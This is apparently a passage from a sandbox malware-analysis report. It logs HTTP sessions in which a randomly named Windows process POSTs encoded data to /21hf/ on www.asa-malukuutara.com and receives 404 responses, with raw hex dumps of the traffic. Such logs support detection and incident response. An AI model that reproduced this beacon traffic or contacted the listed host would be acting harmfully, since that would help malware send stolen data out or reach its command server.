                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 58 37 4c 61 69 54 6b 6b 6c 53 4c 43 52 35 68 63 4b 2f 46 54 61 30 6e 76 50 71 6b 6c 63 6a 50 37 41 45 58 44 77 75 52 73 75 78 35 51 31 6e 65 71 42 58 58 68 45 4f 51 54 4d 47 58 46 61 37 4c 36 51 50 45 42 4d 6c 36 33 51 56 35 77 6b 4b 59 74 58 41 77 76 4a 5a 61 34 39 37 71 6e 50 6a 49 31 58 6d 32 55 71 6e 45 31 4c 75 6a 34 56 66 54 55 68 48 6b 7a 61 50 72 42 37 4b 46 56 76 67 64 6f 7a 68 2b 67 6f 77 39 63 54 59 76 5a 53 5a 5a 31 34 62 69 73 2b 6c 62 62 49 33 51 77 78 68 5a 32 36 46 42 4c 35 43 49 70 6d 44 4f 4f 79 75 65 4e 35 56 77 4f 41 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=k3lrS/T5T2y61X7LaiTkklSLCR5hcK/FTa0nvPqklcjP7AEXDwuRsux5Q1neqBXXhEOQTMGXFa7L6QPEBMl63QV5wkKYtXAwvJZa497qnPjI1Xm2UqnE1Luj4VfTUhHkzaPrB7KFVvgdozh+gow9cTYvZSZZ14bis+lbbI3QwxhZ26FBL5CIpmDOOyueN5VwOA==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.114974976 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:35:58 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                                                                              Content-Length: 12492
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 53 46 01 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 59 86 10 90 64 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 04 b3 25 c9 3a a7 24 79 f6 c8 d0 7b 24 43 37 bf 77 1f fc 5f 28 36 e3 82 ed 21 c0 2c 58 c4 24 d9 24 ae e1 f2 f4 c2 00 85 13 6f 44 41 94 ec 63 98 d6 6e 7f 9f 75 d7 25 88 88 8a 80 9a b4 f7 12 97 c7 e6 35 c1 52 8d f2 62 32 54 33 19 db ee 0f 07 4e 62 18 54 22 e1 ef ab 8c 59 7b a1 96 52 86 e3 28 89 ff cb 98 5a 36 dd 73 bf c8 49 78 6a 80 48 ac 8b 12 30 b8 9a 73 0d 98 74 f5 0a e9 8e fe 78 9c e3 60 ee 69 51 88 f7 91 0a e5 bc 5c 4b 3c 97 85 a5 80 c8 a1 dd 50 d4 55 51 0f 11 48 30 65 70 a5 12 b8 f4 b7 78 51 00 46 dc e2 63 7a 71 50 97 dd 60 0c d2 21 a1 71 91 d4 78 11 98 92 0c 1c dc 0e 5d ef 81 63 11 14 df 3f 9e 10 25 dc 3d de d1 2f 77 9f 7f 7c df e7 d9 33 9b 7f 68 4d f7 0a 56 b7 d5 a2 e9 1c d2 eb d8 6a 5f ef 17 bb 6d 78 d6 61 a8 9c a2 07 d5 1e 5f 8f 47 af ac 9a [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: SFAI?TM||}grz+ "Cw^\LoK"9dYd^=%:$y{$C7w_(6!,X$$oDAcnu%5Rb2T3NbT"Y{R(Z6sIxjH0stx`iQ\K<PUQH0epxQFczqP`!qx]c?%=/w|3hMVj_mxa_GAO(7yHf^~d9[P3Y.jV">/Q{oFTFe+)+q=d)DG wu;~ whk}}W+To6zO[SZS\=UR&4jG8h9H)nN<Gto}5V{}B_.xQx*viD&LPioXUqHX;dWLtN8VI9V"m<((}?L#ygz4i/4}fQab]OTP0lUUUyL~#;r5+C^]tl~:6mtj}:JLU5:/WB}pU/H:|v&iw_7iAinZn:iSm.A:]L23m~
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115036964 CEST1289INData Raw: 10 9e b0 14 44 ce bf ef 16 2a c6 a8 ad d0 ac 3f d0 b5 6a 0d ba aa c4 fc 5d fb 2d fc ab b7 af da ea 22 b3 1f eb 7e d0 37 37 aa 43 0a cf 71 71 f9 ae 06 8b 7e 29 d3 63 5f b7 db e6 3f be 2f ac 51 a0 72 5d 97 48 38 2e 8c a2 90 a0 d2 3c 0b 61 a2 2a 5b
                                                                                                                                                                                                                                                              Data Ascii: D*?j]-"~77Cqq~)c_?/Qr]H8.<a*[^x"nVo-u}+I_0t|? W^sp;kT8z"t8y|U||!K+M<kVS9F`_QqZ
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115076065 CEST1289INData Raw: e7 81 3a f0 d7 ba 84 0a 55 b8 fb 14 3a 6f 95 f3 54 12 e8 1a 89 ee d7 a6 18 11 6e 6b 2b a2 bd 29 59 01 f7 5e f4 60 f1 45 08 b6 8c 58 9a c7 a7 9c f1 68 d9 26 2c 8d 22 7a f8 2c 20 98 14 29 2e cc 52 38 bd a8 fb 9c f1 f8 24 58 16 65 7f 88 88 c9 36 61
                                                                                                                                                                                                                                                              Data Ascii: :U:oTnk+)Y^`EXh&,"z, ).R8$Xe6aQpf,J;h2nE5N,qgc%[Tf\+1"ELD?w^ ii)?7N@%vq2x;!;7r184dC2
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115113020 CEST1289INData Raw: 52 08 e6 fe b0 10 15 c2 7d e2 90 6e 69 6a 6a da 69 4b 65 83 63 78 19 ec cd 10 e1 06 26 b9 57 6b 18 1e e8 7c 72 41 62 5e f0 e6 72 72 c1 61 5e 34 3a e0 14 02 4b d5 79 3b 1e df 38 8b c5 01 e9 e8 1c 49 75 a7 08 93 75 93 db bf ef b6 b2 df ce 7c 80 c9
                                                                                                                                                                                                                                                              Data Ascii: R}nijjiKecx&Wk|rAb^rra^4:Ky;8Iuu|3Qs+R8e<cY9)woCa4s52QH;DUp-ErH~Lp4"439r<vXAPsTc|638PWmvcf-)IQ8=g<a#P
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115164995 CEST1289INData Raw: 91 2a fc 09 d5 b7 b1 de 08 af a7 0c d6 3c ba 0b b8 ce 36 4d bd 49 5c 60 92 50 e8 c5 75 c3 a8 f0 d1 a3 bb 80 eb 5c 37 62 5b f3 37 28 28 40 e4 0c 14 3e 7a b4 14 70 bd dc 24 42 bb 13 ac 5c c0 a6 88 96 43 47 34 38 98 dd 77 b3 cc ba 3c 59 c0 b5 18 78
                                                                                                                                                                                                                                                              Data Ascii: *<6MI\`Pu\7b[7((@>zp$B\CG48w<Yx",>.Tk(^K\{"a]kuiM4|XYntPvQAJD)3"0w+>s "q&\Q(WJND'DDvb.'d"a}x8uHE
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115216017 CEST1289INData Raw: f8 1c 20 1c 58 2e 69 bd a1 cc ab 13 83 f4 2a dc 26 13 25 ab b0 41 88 85 04 d4 a0 7c 3f d2 ca 73 ad 73 4c 61 bf 8d 43 81 bb c0 fb 80 c0 78 df 0e 27 8d 05 6b 3d 48 fe 0e da a9 21 02 dc 18 5a 96 52 66 70 dc c2 78 f1 c4 d1 98 6e 3a 5e fc 40 56 7a 3b
                                                                                                                                                                                                                                                              Data Ascii: X.i*&%A|?ssLaCx'k=H!ZRfpxn:^@Vz;fB8Tc<cQn"<fw3B~[/bvLcn_Coz`<[J{:wm*Y3pEz[EtofRcy4RkE+&?%Ill@H
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115252018 CEST1289INData Raw: 6b 5e 67 c7 33 78 e8 e9 63 f4 fd 29 8e bf bb dd 9a dd 84 2c 6f 12 f6 3b 97 4f 21 c3 5a 9a 58 77 ef 7c e2 e1 a5 b9 c6 98 7f 64 96 5b 27 3e 01 1a 76 8e c0 0c 33 3a 74 fa 2e d9 1e f4 bf 76 eb 79 9d 7b 04 6e 9d bb f5 ee e2 4e 71 11 f0 93 0d 09 0a e1
                                                                                                                                                                                                                                                              Data Ascii: k^g3xc),o;O!ZXw|d['>v3:t.vy{nNqVK`nJM[+u76cd>lsLr)tPF$aPOXb_hp`XmKMyhVe%,m[a1}`3;E{?])#
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115294933 CEST1289INData Raw: f7 80 3b 7b 99 79 9f 47 bc 96 5e 66 67 95 d7 0a 6c 2a 16 33 b2 9f 9a f5 a4 ad c6 d4 60 28 f0 b6 1d 52 f9 9d 7b 1e e8 8b eb 3b 12 bf ba c0 07 c7 af 8d f1 3f be 3d f0 09 de b8 39 e6 6f 8f 9f 22 9b 73 39 b4 76 a8 59 3f 1f d6 ba 86 df 71 82 da 85 7a
                                                                                                                                                                                                                                                              Data Ascii: ;{yG^fgl*3`(R{;?=9o"s9vY?qzO~y_mo 1g0Zzom6=g-yps3``]-E`O1'5lQ(;E/eatgC;)jod!a +a7is
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115403891 CEST1289INData Raw: 10 22 08 e0 e8 f3 f4 d4 50 81 be e8 ee 88 a6 c5 4a 70 15 44 66 74 af 9c 2c 24 83 15 92 d2 84 c1 11 a0 cb e0 60 97 4f 51 1a 7a 8b d6 eb aa 38 15 d6 51 6f 1f 03 69 78 36 c3 7f b4 ef 68 79 5f a1 14 d7 ac 42 21 06 d5 98 60 01 60 1c fd da dd 07 02 6b
                                                                                                                                                                                                                                                              Data Ascii: "PJpDft,$`OQz8Qoix6hy_B!``kWFw}[/s9#jvH>vYV)}'f)NK>iB1e,q(D6WPc^2y}Q-NF4U$DLVZI3C
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:59.115451097 CEST1288INData Raw: b3 30 9b de 7c 45 b7 ff b1 1e fb da a8 76 ba 0f 23 6f df b0 31 c5 45 06 5f 7a 26 bd 5e 62 53 20 05 fd 7d 5d a0 a4 fc f0 87 ce bd 7d b0 b3 07 32 b5 ef 67 e3 fb 70 cd e7 bf 0b fe d6 66 34 37 75 b7 63 f3 c6 fb 2a df 1a f4 30 4b c9 a5 7f e4 54 df 53
                                                                                                                                                                                                                                                              Data Ascii: 0|Ev#o1E_z&^bS }]}2gpf47uc*0KTS5*uC4j!4@#ZAx! $&3Tu=]Ubh$H]:}jJ,J#rcu#J@&:#O]]5#uN~\


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.11.2049742103.247.8.5380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:01.483755112 CEST852OUTPOST /21hf/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.asa-malukuutara.com/21hf/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 32 4c 4c 57 68 72 6b 30 31 53 49 4e 78 35 68 57 71 2f 4a 54 61 34 6e 76 4f 65 30 6c 71 4c 50 31 46 67 58 41 7a 32 52 76 75 78 35 4a 46 6e 66 67 68 58 4d 68 45 7a 74 54 4d 4b 58 46 62 66 4c 36 52 2f 45 42 2f 4e 31 31 41 56 2f 34 45 4b 61 6a 33 41 77 76 4a 5a 61 34 39 2f 51 6e 50 37 49 30 69 75 32 55 4f 7a 62 32 4c 75 69 2f 56 66 54 51 68 48 6f 7a 61 50 4a 42 2b 71 38 56 73 49 64 6f 79 39 2b 6a 36 49 69 47 44 59 70 64 53 59 5a 6c 35 4b 58 6c 74 68 4e 53 62 62 74 31 51 74 53 7a 73 55 62 57 4c 32 73 71 31 66 38 4b 43 58 32 50 37 55 72 54 45 4c 65 54 7a 44 56 72 61 39 62 76 36 4e 62 35 43 75 44 41 43 41 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=k3lrS/T5T2y612LLWhrk01SINx5hWq/JTa4nvOe0lqLP1FgXAz2Rvux5JFnfghXMhEztTMKXFbfL6R/EB/N11AV/4EKaj3AwvJZa49/QnP7I0iu2UOzb2Lui/VfTQhHozaPJB+q8VsIdoy9+j6IiGDYpdSYZl5KXlthNSbbt1QtSzsUbWL2sq1f8KCX2P7UrTELeTzDVra9bv6Nb5CuDACA=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.022720098 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:36:01 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                                                                              Content-Length: 12492
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 53 46 01 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 59 86 10 90 64 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 04 b3 25 c9 3a a7 24 79 f6 c8 d0 7b 24 43 37 bf 77 1f fc 5f 28 36 e3 82 ed 21 c0 2c 58 c4 24 d9 24 ae e1 f2 f4 c2 00 85 13 6f 44 41 94 ec 63 98 d6 6e 7f 9f 75 d7 25 88 88 8a 80 9a b4 f7 12 97 c7 e6 35 c1 52 8d f2 62 32 54 33 19 db ee 0f 07 4e 62 18 54 22 e1 ef ab 8c 59 7b a1 96 52 86 e3 28 89 ff cb 98 5a 36 dd 73 bf c8 49 78 6a 80 48 ac 8b 12 30 b8 9a 73 0d 98 74 f5 0a e9 8e fe 78 9c e3 60 ee 69 51 88 f7 91 0a e5 bc 5c 4b 3c 97 85 a5 80 c8 a1 dd 50 d4 55 51 0f 11 48 30 65 70 a5 12 b8 f4 b7 78 51 00 46 dc e2 63 7a 71 50 97 dd 60 0c d2 21 a1 71 91 d4 78 11 98 92 0c 1c dc 0e 5d ef 81 63 11 14 df 3f 9e 10 25 dc 3d de d1 2f 77 9f 7f 7c df e7 d9 33 9b 7f 68 4d f7 0a 56 b7 d5 a2 e9 1c d2 eb d8 6a 5f ef 17 bb 6d 78 d6 61 a8 9c a2 07 d5 1e 5f 8f 47 af ac 9a [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: SFAI?TM||}grz+ "Cw^\LoK"9dYd^=%:$y{$C7w_(6!,X$$oDAcnu%5Rb2T3NbT"Y{R(Z6sIxjH0stx`iQ\K<PUQH0epxQFczqP`!qx]c?%=/w|3hMVj_mxa_GAO(7yHf^~d9[P3Y.jV">/Q{oFTFe+)+q=d)DG wu;~ whk}}W+To6zO[SZS\=UR&4jG8h9H)nN<Gto}5V{}B_.xQx*viD&LPioXUqHX;dWLtN8VI9V"m<((}?L#ygz4i/4}fQab]OTP0lUUUyL~#;r5+C^]tl~:6mtj}:JLU5:/WB}pU/H:|v&iw_7iAinZn:iSm.A:]L23m~
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.022825956 CEST1289INData Raw: 10 9e b0 14 44 ce bf ef 16 2a c6 a8 ad d0 ac 3f d0 b5 6a 0d ba aa c4 fc 5d fb 2d fc ab b7 af da ea 22 b3 1f eb 7e d0 37 37 aa 43 0a cf 71 71 f9 ae 06 8b 7e 29 d3 63 5f b7 db e6 3f be 2f ac 51 a0 72 5d 97 48 38 2e 8c a2 90 a0 d2 3c 0b 61 a2 2a 5b
                                                                                                                                                                                                                                                              Data Ascii: D*?j]-"~77Cqq~)c_?/Qr]H8.<a*[^x"nVo-u}+I_0t|? W^sp;kT8z"t8y|U||!K+M<kVS9F`_QqZ
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.022888899 CEST1289INData Raw: e7 81 3a f0 d7 ba 84 0a 55 b8 fb 14 3a 6f 95 f3 54 12 e8 1a 89 ee d7 a6 18 11 6e 6b 2b a2 bd 29 59 01 f7 5e f4 60 f1 45 08 b6 8c 58 9a c7 a7 9c f1 68 d9 26 2c 8d 22 7a f8 2c 20 98 14 29 2e cc 52 38 bd a8 fb 9c f1 f8 24 58 16 65 7f 88 88 c9 36 61
                                                                                                                                                                                                                                                              Data Ascii: :U:oTnk+)Y^`EXh&,"z, ).R8$Xe6aQpf,J;h2nE5N,qgc%[Tf\+1"ELD?w^ ii)?7N@%vq2x;!;7r184dC2
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.022945881 CEST1289INData Raw: 52 08 e6 fe b0 10 15 c2 7d e2 90 6e 69 6a 6a da 69 4b 65 83 63 78 19 ec cd 10 e1 06 26 b9 57 6b 18 1e e8 7c 72 41 62 5e f0 e6 72 72 c1 61 5e 34 3a e0 14 02 4b d5 79 3b 1e df 38 8b c5 01 e9 e8 1c 49 75 a7 08 93 75 93 db bf ef b6 b2 df ce 7c 80 c9
                                                                                                                                                                                                                                                              Data Ascii: R}nijjiKecx&Wk|rAb^rra^4:Ky;8Iuu|3Qs+R8e<cY9)woCa4s52QH;DUp-ErH~Lp4"439r<vXAPsTc|638PWmvcf-)IQ8=g<a#P
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023029089 CEST1289INData Raw: 91 2a fc 09 d5 b7 b1 de 08 af a7 0c d6 3c ba 0b b8 ce 36 4d bd 49 5c 60 92 50 e8 c5 75 c3 a8 f0 d1 a3 bb 80 eb 5c 37 62 5b f3 37 28 28 40 e4 0c 14 3e 7a b4 14 70 bd dc 24 42 bb 13 ac 5c c0 a6 88 96 43 47 34 38 98 dd 77 b3 cc ba 3c 59 c0 b5 18 78
                                                                                                                                                                                                                                                              Data Ascii: *<6MI\`Pu\7b[7((@>zp$B\CG48w<Yx",>.Tk(^K\{"a]kuiM4|XYntPvQAJD)3"0w+>s "q&\Q(WJND'DDvb.'d"a}x8uHE
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023086071 CEST1289INData Raw: f8 1c 20 1c 58 2e 69 bd a1 cc ab 13 83 f4 2a dc 26 13 25 ab b0 41 88 85 04 d4 a0 7c 3f d2 ca 73 ad 73 4c 61 bf 8d 43 81 bb c0 fb 80 c0 78 df 0e 27 8d 05 6b 3d 48 fe 0e da a9 21 02 dc 18 5a 96 52 66 70 dc c2 78 f1 c4 d1 98 6e 3a 5e fc 40 56 7a 3b
                                                                                                                                                                                                                                                              Data Ascii: X.i*&%A|?ssLaCx'k=H!ZRfpxn:^@Vz;fB8Tc<cQn"<fw3B~[/bvLcn_Coz`<[J{:wm*Y3pEz[EtofRcy4RkE+&?%Ill@H
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023161888 CEST1289INData Raw: 6b 5e 67 c7 33 78 e8 e9 63 f4 fd 29 8e bf bb dd 9a dd 84 2c 6f 12 f6 3b 97 4f 21 c3 5a 9a 58 77 ef 7c e2 e1 a5 b9 c6 98 7f 64 96 5b 27 3e 01 1a 76 8e c0 0c 33 3a 74 fa 2e d9 1e f4 bf 76 eb 79 9d 7b 04 6e 9d bb f5 ee e2 4e 71 11 f0 93 0d 09 0a e1
                                                                                                                                                                                                                                                              Data Ascii: k^g3xc),o;O!ZXw|d['>v3:t.vy{nNqVK`nJM[+u76cd>lsLr)tPF$aPOXb_hp`XmKMyhVe%,m[a1}`3;E{?])#
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023257971 CEST1289INData Raw: f7 80 3b 7b 99 79 9f 47 bc 96 5e 66 67 95 d7 0a 6c 2a 16 33 b2 9f 9a f5 a4 ad c6 d4 60 28 f0 b6 1d 52 f9 9d 7b 1e e8 8b eb 3b 12 bf ba c0 07 c7 af 8d f1 3f be 3d f0 09 de b8 39 e6 6f 8f 9f 22 9b 73 39 b4 76 a8 59 3f 1f d6 ba 86 df 71 82 da 85 7a
                                                                                                                                                                                                                                                              Data Ascii: ;{yG^fgl*3`(R{;?=9o"s9vY?qzO~y_mo 1g0Zzom6=g-yps3``]-E`O1'5lQ(;E/eatgC;)jod!a +a7is
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023705006 CEST1289INData Raw: 10 22 08 e0 e8 f3 f4 d4 50 81 be e8 ee 88 a6 c5 4a 70 15 44 66 74 af 9c 2c 24 83 15 92 d2 84 c1 11 a0 cb e0 60 97 4f 51 1a 7a 8b d6 eb aa 38 15 d6 51 6f 1f 03 69 78 36 c3 7f b4 ef 68 79 5f a1 14 d7 ac 42 21 06 d5 98 60 01 60 1c fd da dd 07 02 6b
                                                                                                                                                                                                                                                              Data Ascii: "PJpDft,$`OQz8Qoix6hy_B!``kWFw}[/s9#jvH>vYV)}'f)NK>iB1e,q(D6WPc^2y}Q-NF4U$DLVZI3C
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023767948 CEST1288INData Raw: b3 30 9b de 7c 45 b7 ff b1 1e fb da a8 76 ba 0f 23 6f df b0 31 c5 45 06 5f 7a 26 bd 5e 62 53 20 05 fd 7d 5d a0 a4 fc f0 87 ce bd 7d b0 b3 07 32 b5 ef 67 e3 fb 70 cd e7 bf 0b fe d6 66 34 37 75 b7 63 f3 c6 fb 2a df 1a f4 30 4b c9 a5 7f e4 54 df 53
                                                                                                                                                                                                                                                              Data Ascii: 0|Ev#o1E_z&^bS }]}2gpf47uc*0KTS5*uC4j!4@#ZAx! $&3Tu=]Ubh$H]:}jJ,J#rcu#J@&:#O]]5#uN~\


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              3192.168.11.2049743103.247.8.5380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.420373917 CEST8001OUTPOST /21hf/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.asa-malukuutara.com/21hf/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 32 4c 4c 57 68 72 6b 30 31 53 49 4e 78 35 68 57 71 2f 4a 54 61 34 6e 76 4f 65 30 6c 71 44 50 31 7a 73 58 41 53 32 52 75 75 78 35 42 6c 6e 43 67 68 57 4f 68 45 62 70 54 4d 57 74 46 5a 58 4c 35 79 6e 45 4b 75 4e 31 38 41 56 2f 36 45 4b 58 74 58 41 6c 76 4a 4a 46 34 39 76 51 6e 50 37 49 30 6a 65 32 64 36 6e 62 77 4c 75 6a 34 56 66 58 55 68 47 42 7a 61 57 2b 42 2b 6d 7a 56 64 6f 64 6f 57 64 2b 6d 50 63 69 4e 44 59 72 51 79 59 33 6c 35 47 2b 6c 73 4e 72 53 61 75 49 31 52 31 53 79 5a 31 43 42 2b 57 52 37 6d 50 6a 47 7a 6a 30 4a 36 49 62 4e 6b 48 57 57 56 4c 75 70 63 6c 72 73 4d 78 6d 69 42 36 7a 63 6e 59 4f 46 4c 62 31 48 77 4c 38 6d 74 4b 4b 43 51 73 73 74 45 4b 79 76 33 54 70 4a 45 4f 56 4a 47 47 5a 43 73 67 63 48 51 70 33 75 74 34 6e 70 64 39 31 4c 77 79 7a 7a 67 2f 66 75 65 61 5a 57 70 4b 4c 43 36 6a 69 67 45 56 4b 32 33 6e 31 52 62 56 76 43 71 4e 77 2f 4a 7a 36 6b 39 71 76 51 36 74 58 54 55 49 44 51 2f 41 2f 79 58 30 77 4a 4e 68 4c 4a 50 33 59 79 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=k3lrS/T5T2y612LLWhrk01SINx5hWq/JTa4nvOe0lqDP1zsXAS2Ruux5BlnCghWOhEbpTMWtFZXL5ynEKuN18AV/6EKXtXAlvJJF49vQnP7I0je2d6nbwLuj4VfXUhGBzaW+B+mzVdodoWd+mPciNDYrQyY3l5G+lsNrSauI1R1SyZ1CB+WR7mPjGzj0J6IbNkHWWVLupclrsMxmiB6zcnYOFLb1HwL8mtKKCQsstEKyv3TpJEOVJGGZCsgcHQp3ut4npd91Lwyzzg/fueaZWpKLC6jigEVK23n1RbVvCqNw/Jz6k9qvQ6tXTUIDQ/A/yX0wJNhLJP3YykCYEICS+ikqLt5wwS9QZU/G5kIyQoOJVFv6kbByMJtX/dqHzEQwXG/wUnPKpw3WibyKD4UqKla65Kb5dGWgUzIpr83BiXMMctTnH5KgMOf7Y8CJ+nv2ckzjOjiEJIgjCkc8UA+0LKmkVtWo4PEQ3BtrLOY0A1av0M11CcQNljFGpQzCDuswTZdGm01lTgp/nGYia65/0WUiS+nzk9JhRxGdlX2EnYZIFreeRml4YLW++m5Nvz31wx4bCiWZMXIzBSUgSPjik4EygNrnVcCY+z4CfPocYYOVQIREO71iSqh1n0+Cwc8L4d7OQq3JbTSw9m0ANtDYK9XSBF4Dsr/yPvrO21u3m4zuB1gDTCHSXom92o6TXiB1+Go/8C0HCK+lhitrmdiPeBuPUPIrYyU7/IESgFU6oNENqaALk97mxq9qaBuOpn4bdWPKGjG73yBU67RVbuhoBeoGZ4d7FC/DrGQxTlJbVvF3FM84Af/ka3w4MKaOgUqrRliygMycsymtnOVwsKC5nC4F51V0eBoKOstjrszWDHxGiUdYFX7d+Sih6PV1Kef5xUb8CilSgZC6fNGXim25A8KIaTY7CidWUzhCCpoUtcb92YVvoDI97/eOUPHmms/vW7VWWOvasLFxOuPseEhv2W61B1gF0tZrGwsgvHMR2jG/reO [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090292931 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:36:04 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: br
                                                                                                                                                                                                                                                              Content-Length: 12492
